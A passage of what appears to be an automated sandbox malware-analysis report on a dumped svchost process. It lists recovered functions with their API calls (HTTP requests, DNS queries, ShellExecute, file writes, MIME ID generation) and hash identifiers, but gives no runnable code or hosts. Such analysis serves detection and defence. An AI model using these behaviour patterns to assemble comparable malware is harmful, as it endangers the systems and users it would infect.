                                                                                                                                                                                • Opcode ID: 6574907d64a1d9367c674465d6f8eb0d2fac05f8a3635993c3481088b0551f84
                                                                                                                                                                                • Instruction ID: 7e6c1805d5825ce401789290188eb31f8bcae88a10db01c7d1f936579a7b304f
                                                                                                                                                                                • Opcode Fuzzy Hash: 6574907d64a1d9367c674465d6f8eb0d2fac05f8a3635993c3481088b0551f84
                                                                                                                                                                                • Instruction Fuzzy Hash: 78018FB1500274AFD305BFA2DEC899A7AA9EB05249B194835F90693204C7784844CBB1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6e0d4a3d2429b93a4a7cb9780e70630c90e38dc0a23be2364b1c749f32da8482
                                                                                                                                                                                • Instruction ID: 53fa937a2e4640bdab25448aa84fdf78aa407900dd075097993abd9ddb9b00cc
                                                                                                                                                                                • Opcode Fuzzy Hash: 6e0d4a3d2429b93a4a7cb9780e70630c90e38dc0a23be2364b1c749f32da8482
                                                                                                                                                                                • Instruction Fuzzy Hash: 8341D871704356EBD7009A76CF41FAE3A5DDF406BCF784E22B821E51D4EB70E4868961
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 13155480
                                                                                                                                                                                • __isctype_l.LIBCMT ref: 131554F3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locale$UpdateUpdate::___isctype_l
                                                                                                                                                                                • String ID: $$+$-$0$0
                                                                                                                                                                                • API String ID: 2547950892-4042548909
                                                                                                                                                                                • Opcode ID: d2b3e845f7807b4b5b67cdf3126a2f40e6913829005909c4e3aceb6e8a7baea6
                                                                                                                                                                                • Instruction ID: bed7f8d5fe0791fea89fabeed2b31112ef0fb04b8af07330ba512e141b0183dc
                                                                                                                                                                                • Opcode Fuzzy Hash: d2b3e845f7807b4b5b67cdf3126a2f40e6913829005909c4e3aceb6e8a7baea6
                                                                                                                                                                                • Instruction Fuzzy Hash: AE71CD7091228ACFDB11CF68C6513AE7BB6AF03365F6D0159F8B3D6191D3309A91CBA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTickCount.KERNEL32(00000000,?,00000000,?,13161EF0,00000000), ref: 1314BEE3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick
                                                                                                                                                                                • String ID: L'
                                                                                                                                                                                • API String ID: 536389180-3089082269
                                                                                                                                                                                • Opcode ID: b0d7ee5c1280d99237a9c6e9605b0dc3947092799fc12b25058896235108e33f
                                                                                                                                                                                • Instruction ID: 7c7e04ce77545a9cc11d37c0786e132adab084c0dab7ed07bb1ed7d5527e31ad
                                                                                                                                                                                • Opcode Fuzzy Hash: b0d7ee5c1280d99237a9c6e9605b0dc3947092799fc12b25058896235108e33f
                                                                                                                                                                                • Instruction Fuzzy Hash: 83514175D00309FFCF14CF98C9848AEBBB9FF05354B34866AE569A7291D7309A81CB91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • StrStrA.SHLWAPI(?,1314CF84,00000000,00000000,?,1314CF83,?), ref: 13151ADD
                                                                                                                                                                                • StrStrA.SHLWAPI(00000002,131414B4), ref: 13151BBE
                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 13151BD3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                • String ID: %$u
                                                                                                                                                                                • API String ID: 1659193697-272644364
                                                                                                                                                                                • Opcode ID: 6f79d57cc8ab92568f8459b56f6dc0803d09fe113d331141b23c192b1ccab5fe
                                                                                                                                                                                • Instruction ID: 01aa0544f7e2138b37dc91f458ba75084e280e9010b060101939365ef013305d
                                                                                                                                                                                • Opcode Fuzzy Hash: 6f79d57cc8ab92568f8459b56f6dc0803d09fe113d331141b23c192b1ccab5fe
                                                                                                                                                                                • Instruction Fuzzy Hash: BC41A176A0024AAFDB02DF7C8D849AE7BB9EF16244B194578F855E7204E734EE04CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,131414A8,?,00000000,00000000,?,?), ref: 131504EE
                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,131414A8,00000000), ref: 13150525
                                                                                                                                                                                • StrStrA.SHLWAPI(00000001,131414A8), ref: 13150551
                                                                                                                                                                                • StrStrA.SHLWAPI(?,131414A8), ref: 13150584
                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,131413B4), ref: 1315059E
                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,131414A4), ref: 131505AA
                                                                                                                                                                                • wnsprintfA.SHLWAPI(?,00000014,13141420,00000000,00000000,00000014,00000000,00000000), ref: 131505CF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wnsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 167729887-0
                                                                                                                                                                                • Opcode ID: 4620c965125b7bece3f2ca3256c721ccba385a26e10ec27547b7ae7a255c1eb9
                                                                                                                                                                                • Instruction ID: a6ff255ed67f6392e07df8d19f3ae9cc02a2b561499c0f923b17916563e3073b
                                                                                                                                                                                • Opcode Fuzzy Hash: 4620c965125b7bece3f2ca3256c721ccba385a26e10ec27547b7ae7a255c1eb9
                                                                                                                                                                                • Instruction Fuzzy Hash: 9F61C035A01249BFDF014FA5CD40FAE3BAAEF87254F188029FC356B290DB31D941DAA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • getSystemCP.LIBCMT ref: 131544C8
                                                                                                                                                                                  • Part of subcall function 13154435: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 13154442
                                                                                                                                                                                  • Part of subcall function 13154435: GetOEMCP.KERNEL32(00000000), ref: 1315445C
                                                                                                                                                                                • setSBCS.LIBCMT ref: 131544DA
                                                                                                                                                                                  • Part of subcall function 13154130: _memset.LIBCMT ref: 13154143
                                                                                                                                                                                • IsValidCodePage.KERNEL32(-00000030), ref: 13154520
                                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,?), ref: 13154533
                                                                                                                                                                                • _memset.LIBCMT ref: 1315454B
                                                                                                                                                                                • setSBUpLow.LIBCMT ref: 1315461E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2658552758-0
                                                                                                                                                                                • Opcode ID: af18a46d693f277a3becd28f6804c801e3623c72dd25ab6cf07ae02fca43cde2
                                                                                                                                                                                • Instruction ID: 259ffcc76c571c273d729dd352e0eb1f8d466d9ffdb8b133224f34a6d63f1319
                                                                                                                                                                                • Opcode Fuzzy Hash: af18a46d693f277a3becd28f6804c801e3623c72dd25ab6cf07ae02fca43cde2
                                                                                                                                                                                • Instruction Fuzzy Hash: FE510831B842559BDF15CF29C5C02AABBB5FF07305F19806AF8A1AB142DF38D546CB90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000,1314E1F6,00000000,1314E1F6,1314E1F5,00000050,1314E1F5,?,?,-00000004,0000008C,00000000), ref: 13145058
                                                                                                                                                                                • InternetConnectA.WININET(00000000,00000003,00000000,00000000,00000000,00000003,00000000,00000000,?,?,-00000004,0000008C,00000000,?,00000000), ref: 13145078
                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000104,?,?,-00000004,0000008C,00000000,?,00000000), ref: 1314508D
                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,?,-00000004,0000008C,00000000,?,00000000), ref: 1314509E
                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000005,?,00000000), ref: 131450BB
                                                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,0000000A,0000000A), ref: 131450F3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HttpInternet$OpenRequest$ConnectFileInfoQueryReadSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2757949531-0
                                                                                                                                                                                • Opcode ID: 22a331550de01ec2645564005e4bf32a19f9b79704b9f3f78d1406bbc28db17e
                                                                                                                                                                                • Instruction ID: 09c29ee9dc8f61bf166d10f3b65744c0c26bb08a5acef0fee06af39049fcad0c
                                                                                                                                                                                • Opcode Fuzzy Hash: 22a331550de01ec2645564005e4bf32a19f9b79704b9f3f78d1406bbc28db17e
                                                                                                                                                                                • Instruction Fuzzy Hash: 07211D76601229FBC7219FA5CD88DDF7EBCEF4AA94B240465F505E2144E7758A00DAF0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,13153CE0,1315291D,?,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152A34
                                                                                                                                                                                • TlsGetValue.KERNEL32(FFFFFFFF,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2,0000000E), ref: 13152A4B
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2,0000000E), ref: 13152A60
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DecodePointer,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2), ref: 13152A7B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$AddressHandleModuleProc
                                                                                                                                                                                • String ID: DecodePointer$KERNEL32.DLL
                                                                                                                                                                                • API String ID: 1929421221-629428536
                                                                                                                                                                                • Opcode ID: a609e0a7ba11ec13703ef7aa25dba9acf97b0a5567b04403f26ecb8a3393253b
                                                                                                                                                                                • Instruction ID: b4e05761edf62e54dbc4545019f5d9e869c00bef6ec4c5d3774284c63bf699bc
                                                                                                                                                                                • Opcode Fuzzy Hash: a609e0a7ba11ec13703ef7aa25dba9acf97b0a5567b04403f26ecb8a3393253b
                                                                                                                                                                                • Instruction Fuzzy Hash: 0BF09032B016339BDB25AB34CD809EA3BE49F0765570A9530F834D2568DB34CC038AB1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,13152A25,00000000,13154BC5,00000000,00000000,00000314,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529BD
                                                                                                                                                                                • TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529D4
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529E9
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 13152A04
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$AddressHandleModuleProc
                                                                                                                                                                                • String ID: EncodePointer$KERNEL32.DLL
                                                                                                                                                                                • API String ID: 1929421221-3682587211
                                                                                                                                                                                • Opcode ID: dbd8e95abb6b26bb792cc7c44c719981a33c5c225c9ed220c3a3ad9b10ba74aa
                                                                                                                                                                                • Instruction ID: 24c0117114e492440c28f1d5c39adab70944fff5a4f1df7456b3bd22a83b3f8f
                                                                                                                                                                                • Opcode Fuzzy Hash: dbd8e95abb6b26bb792cc7c44c719981a33c5c225c9ed220c3a3ad9b10ba74aa
                                                                                                                                                                                • Instruction Fuzzy Hash: 69F0BB32A016339FD715AB34CD409E93FE4AF026A571A5031F834D2664DB34C843CBB1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e9483793b51f18562a042eab7b94ad45d390c3c37eb3d74f0cf4db488e0e7b62
                                                                                                                                                                                • Instruction ID: a1bc85e87a5082a15a66d266459d616b395269c07320ba7d49f003b92ade8b0e
                                                                                                                                                                                • Opcode Fuzzy Hash: e9483793b51f18562a042eab7b94ad45d390c3c37eb3d74f0cf4db488e0e7b62
                                                                                                                                                                                • Instruction Fuzzy Hash: 52A1A1B1D00259AFEB11CBA4CE40BEE7FF9AF05244F384065ED45A7241E772AA45CBA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13144EB1: EnterCriticalSection.KERNEL32(00000000,1314E300,?,00000000,00000000,-00000004,00000049,00000000,00000002), ref: 13144EBC
                                                                                                                                                                                • StrStrA.SHLWAPI(1314E1F5,13141448,?,?,-00000004,0000008C,00000000,?,00000000), ref: 1314DE4A
                                                                                                                                                                                • StrStrA.SHLWAPI(1314E1F5,-00000004,0000008B,?,?,-00000004,0000008C,00000000,?,00000000), ref: 1314DE6F
                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104,?,?,?,?,?,?,-00000004,0000008C,00000000,?,00000000), ref: 1314DED5
                                                                                                                                                                                • GetTickCount.KERNEL32(?,?,?,?,?,?,-00000004,0000008C,00000000,?,00000000), ref: 1314DEDB
                                                                                                                                                                                • wnsprintfA.SHLWAPI(?,00000104,-00000004,0000008D,?,00000000,?,?,?,?,?,?,-00000004,0000008C,00000000), ref: 1314DF0B
                                                                                                                                                                                • ShellExecuteA.SHELL32(00000000,-00000004,0000008E,?,00000000,00000000,00000001), ref: 1314DF41
                                                                                                                                                                                  • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountCriticalDirectoryEnterExecuteSectionShellSystemTicklstrlenwnsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 995194965-0
                                                                                                                                                                                • Opcode ID: a9de7a82308af1a356166212936f2a7928739ccb7253ce2533b3db79f9310f93
                                                                                                                                                                                • Instruction ID: 25786c2885fcad19d596d6f504470bd67597c84aa9e96aba49c8f22b5a5c1480
                                                                                                                                                                                • Opcode Fuzzy Hash: a9de7a82308af1a356166212936f2a7928739ccb7253ce2533b3db79f9310f93
                                                                                                                                                                                • Instruction Fuzzy Hash: 867126B6A00354BFDF14DFA4CC909DE77ADEB41304F684079E445A7281DB74AA81CBA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GdipAlloc.GDIPLUS(00000008,00000000,?,131475F5), ref: 1314F518
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocGdip
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1856340535-0
                                                                                                                                                                                • Opcode ID: aebcb12a3578fe10b01d8265182e782cd0a2cf7a18f50d2cb95028721df1330d
                                                                                                                                                                                • Instruction ID: 58c0bede6d2ce8bc3834ef223cce97252fcec478fb1f6e2d05153a6d4ce50cdf
                                                                                                                                                                                • Opcode Fuzzy Hash: aebcb12a3578fe10b01d8265182e782cd0a2cf7a18f50d2cb95028721df1330d
                                                                                                                                                                                • Instruction Fuzzy Hash: 3941D67AF40315ABCF059FF8C9846ADB7B9EF48240F384439E515A7340DF759A588BA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • wnsprintfA.SHLWAPI(13AEBD78,0000003F,-00000004,000000D7,?,?,?,?,00000000,00000000), ref: 1314D075
                                                                                                                                                                                  • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                • wnsprintfA.SHLWAPI(?,00000032,-00000004,000000DD,?,?,?), ref: 1314D0AE
                                                                                                                                                                                • DnsQuery_A.DNSAPI(?,0000000C,00000028,00000000,?,00000000), ref: 1314D0C1
                                                                                                                                                                                • StrStrIA.SHLWAPI(?,-00000004,000000BD,0000000C,00000028,00000000,?,00000000), ref: 1314D0E6
                                                                                                                                                                                • DnsRecordListFree.DNSAPI(?,?), ref: 1314D14E
                                                                                                                                                                                • GetLastError.KERNEL32(0000000C,00000028,00000000,?,00000000), ref: 1314D17B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wnsprintf$ErrorFreeLastListQuery_Recordlstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3873175859-0
                                                                                                                                                                                • Opcode ID: b9a01a87296449b41382b83979c05cedc972fd9e8370d67458ba98add1af47bf
                                                                                                                                                                                • Instruction ID: bc62b6f53ce000f612bbbc7078d564fc3d92f5ae585763868b6e5887046a94d4
                                                                                                                                                                                • Opcode Fuzzy Hash: b9a01a87296449b41382b83979c05cedc972fd9e8370d67458ba98add1af47bf
                                                                                                                                                                                • Instruction Fuzzy Hash: 2F4128B16402596FEB25ABA8CC91BEA3BDCEB15704FA80026FD60D2193D368D554DB31
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExA.KERNEL32(-00000004,000000F5,00000000,00000000,00000004,00000001), ref: 13146E28
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,-00000004,000000F6,000000F4), ref: 13146E47
                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 13146E5D
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 13146E6E
                                                                                                                                                                                • wnsprintfA.SHLWAPI(00000000,00000020,-00000004,0000005A,000000F4), ref: 13146E98
                                                                                                                                                                                • wnsprintfA.SHLWAPI(00000000,00000020,-00000004,000000F7,000000F4), ref: 13146EBD
                                                                                                                                                                                  • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryTimewnsprintf$AddressFileFreeLoadProcSystemlstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2555659749-0
                                                                                                                                                                                • Opcode ID: e0bff822e13d61dd72824745379a1d524290620c2234ef465190ce2767934253
                                                                                                                                                                                • Instruction ID: 65c2ee745b24d8afc592ee7e773b41c5e4be4c040a78e8adda1288c531677f7c
                                                                                                                                                                                • Opcode Fuzzy Hash: e0bff822e13d61dd72824745379a1d524290620c2234ef465190ce2767934253
                                                                                                                                                                                • Instruction Fuzzy Hash: 23218B72900229FBDB00EFA4CC849EE7B7CEF08B28F248425F505A6244D7719A55CBA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenFile.KERNEL32(00000000,?,00000042,00000104,00000000), ref: 13144B8A
                                                                                                                                                                                • OpenFile.KERNEL32(00000000,?,00001042), ref: 13144BA2
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 13144BA6
                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 13144BB2
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,1314DF21,1314E1F5,00000000), ref: 13144BC4
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 13144BCB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Open$CloseErrorHandleLastPointerWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1166246964-0
                                                                                                                                                                                • Opcode ID: 51cdfe6b6749e1e5a26ed3c2d898b94d31f371a768f9a6befa70090ac7cf3a87
                                                                                                                                                                                • Instruction ID: eb059693e3b0b8f311bb134399644d03a10fbc70257f38f66da383a90725c8e9
                                                                                                                                                                                • Opcode Fuzzy Hash: 51cdfe6b6749e1e5a26ed3c2d898b94d31f371a768f9a6befa70090ac7cf3a87
                                                                                                                                                                                • Instruction Fuzzy Hash: 2EF04F72601168BBDB246B66DC88DEF3FBDEB89664F008125FA09D3084DB748945DFB0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(inetcomm.dll,00000000,00000000,00000067,?,?,?,?,?,?,?,?,?,1314DA7C,00000000), ref: 13146CF5
                                                                                                                                                                                • LoadLibraryA.KERNEL32(inetcomm.dll,?,?,?,?,?,?,?,?,?,1314DA7C,00000000), ref: 13146D00
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                                • String ID: MimeOleGenerateMID$inetcomm.dll
                                                                                                                                                                                • API String ID: 4133054770-2511522974
                                                                                                                                                                                • Opcode ID: e3e540684587937ccb7cf40a0e340e685950e2ca83b8d4d2a4d2e458e2cd3bd0
                                                                                                                                                                                • Instruction ID: 25bd4512514dc55affc185b9eb9f5f98a782423595e1deea50a12f05e28876b8
                                                                                                                                                                                • Opcode Fuzzy Hash: e3e540684587937ccb7cf40a0e340e685950e2ca83b8d4d2a4d2e458e2cd3bd0
                                                                                                                                                                                • Instruction Fuzzy Hash: 46F0E531344222EBC301AB39AC04B8FBA6DDFC5D7AF380838F180F1004E72494425276
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a9c0f0ee489942955c4d027aee019131bbe61b98e97264bedac0433adbc81ef9
                                                                                                                                                                                • Instruction ID: ee50b3158d8374e2205bbdc78726c599e77e4a5b8b3f5f2d8e843d41d0ff5688
                                                                                                                                                                                • Opcode Fuzzy Hash: a9c0f0ee489942955c4d027aee019131bbe61b98e97264bedac0433adbc81ef9
                                                                                                                                                                                • Instruction Fuzzy Hash: F7B191B5A00306EFDB14CFA8CC91E6EBBB9FF18304F244569E956AB691D730E911CB50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrcmpA.KERNEL32(1314DA5B,-00000004,00000042,-00000004,0000007A,00000000,1314E1F1,00000000,1314E1F5), ref: 1314D376
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcmp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1534048567-0
                                                                                                                                                                                • Opcode ID: 12f2c09409d24c4e054f6c672668061102ef24238b7d1e7e0faab0b08158be4f
                                                                                                                                                                                • Instruction ID: 6cabc15ffc21ca0ef62386b654588a5c7bc9dc68298394349ababf14b398281b
